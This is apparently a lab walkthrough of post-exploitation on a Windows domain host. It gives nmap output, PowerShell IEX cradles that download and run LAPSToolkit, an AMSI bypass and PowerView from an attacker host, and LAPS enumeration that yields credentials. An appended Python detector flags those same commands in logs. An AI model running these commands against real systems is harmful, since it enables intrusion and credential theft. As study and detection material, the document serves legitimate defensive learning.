Nmap initial output

Command: nmap -A -Pn 192.168.243.122

Nmap scan report for 192.168.243.122
Host is up (0.21s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=client.infinity.com
| Not valid before: 2022-07-08T13:32:36
|_Not valid after:  2023-01-07T13:32:36
|_ssl-date: 2022-07-09T13:38:14+00:00; +1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: INFINITY
|   NetBIOS_Domain_Name: INFINITY
|   NetBIOS_Computer_Name: CLIENT
|   DNS_Domain_Name: infinity.com
|   DNS_Computer_Name: client.infinity.com
|   DNS_Tree_Name: infinity.com
|   Product_Version: 10.0.18362
|_  System_Time: 2022-07-09T13:37:33+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP (92%), AVtech embedded (87%), FreeBSD 6.X|10.X (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:freebsd:freebsd:6.2 cpe:/o:freebsd:freebsd:10.3
Aggressive OS guesses: Microsoft Windows XP SP3 (92%), AVtech Room Alert 26W environmental monitor (87%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows XP SP2 (85%), FreeBSD 10.3-STABLE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
-   Hop 1 is the same as for 192.168.243.121
2   211.92 ms 192.168.243.122

Post-scan script results:
| clock-skew: 
|   0s: 
|     192.168.243.122
|     192.168.243.121
|_    192.168.243.120
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 3 IP addresses (3 hosts up) scanned in 112.46 seconds

From 192.168.243.121 we obtained a reverse shell on 192.168.243.122, continuing from the part already written up for 121:

Upload the LAPS enumeration tool LAPSToolkit:

PS C:\Windows\Tasks> IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/LAPSToolkit.ps1'))

Steps:

PS C:\\Windows\\Tasks> Find-LAPSDelegatedGroups

(screenshot: 17.png)

The scan output shows that this host is joined to a domain. Upload PowerView 2.0, because one of the functions used later comes from PowerView 2.0.

First, bypass AMSI:

PS C:\Windows\Tasks> IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/amsi.txt'))

Then upload PowerView 2.0 and load it into memory:

PS C:\Windows\Tasks> IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/Old_PowerView.ps1'))

(screenshot: 18.png)

PS C:\Windows\Tasks> Get-NetGroupMember -GroupName "PswReaders"

(screenshot: 18.png)

PS C:\Windows\Tasks> Get-LAPSComputers

(screenshot: 17.png)

This yields the login credentials for web05; for the following steps, see 192.168.243.121.
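As an added example (not part of the original write-up), the detection side of the steps above: a small scanner over PowerShell script block log records that flags the IEX download cradle and the LAPSToolkit/PowerView enumeration cmdlets used on this host. The record layout, the sample records and the user names are constructed for this example.

```python
"""Detection logic for the PowerShell activity shown in this walkthrough.

Scans records shaped like Windows PowerShell event 4104 (script block logging)
for the IEX download cradle and the LAPS / PowerView enumeration cmdlets used
on the page. The record layout and the sample records are constructed for this
example; they are not from the original write-up.
"""
import re

# Patterns built from the commands on the page. IEX is an alias for
# Invoke-Expression, so both spellings are matched; PowerShell is case-insensitive.
RULES = {
    "download_cradle": re.compile(
        r"(IEX|Invoke-Expression)\s*\(.*New-Object\s+System\.Net\.WebClient.*\.DownloadString",
        re.I | re.S),
    "laps_enum": re.compile(r"\b(Find-LAPSDelegatedGroups|Get-LAPSComputers)\b", re.I),
    "powerview_enum": re.compile(r"\bGet-NetGroupMember\b", re.I),
}

def normalize(script):
    """Strip backtick escapes, which can split a cmdlet name in the logged text."""
    return script.replace("`", "")

def scan(records):
    """Return (host, user, rule) triples for every record that matches a rule."""
    hits = []
    for rec in records:
        text = normalize(rec["ScriptBlockText"])
        for name, pattern in RULES.items():
            if pattern.search(text):
                hits.append((rec["Computer"], rec["User"], name))
    return hits

SAMPLE = [  # constructed 4104-style records; host name taken from the nmap output
    {"Computer": "CLIENT.infinity.com", "User": "INFINITY\\svc_example",
     "ScriptBlockText": "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.49.243/LAPSToolkit.ps1'))"},
    {"Computer": "CLIENT.infinity.com", "User": "INFINITY\\svc_example",
     "ScriptBlockText": "Find-LAPSDelegatedGroups"},
    {"Computer": "CLIENT.infinity.com", "User": "INFINITY\\svc_example",
     "ScriptBlockText": "Get-Net`GroupMember -GroupName \"PswReaders\""},
    {"Computer": "CLIENT.infinity.com", "User": "INFINITY\\admin_example",
     "ScriptBlockText": "Get-ChildItem C:\\Windows\\Tasks"},  # benign, should not match
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Three of the four sample records match, in the order the page runs them; the benign directory listing does not.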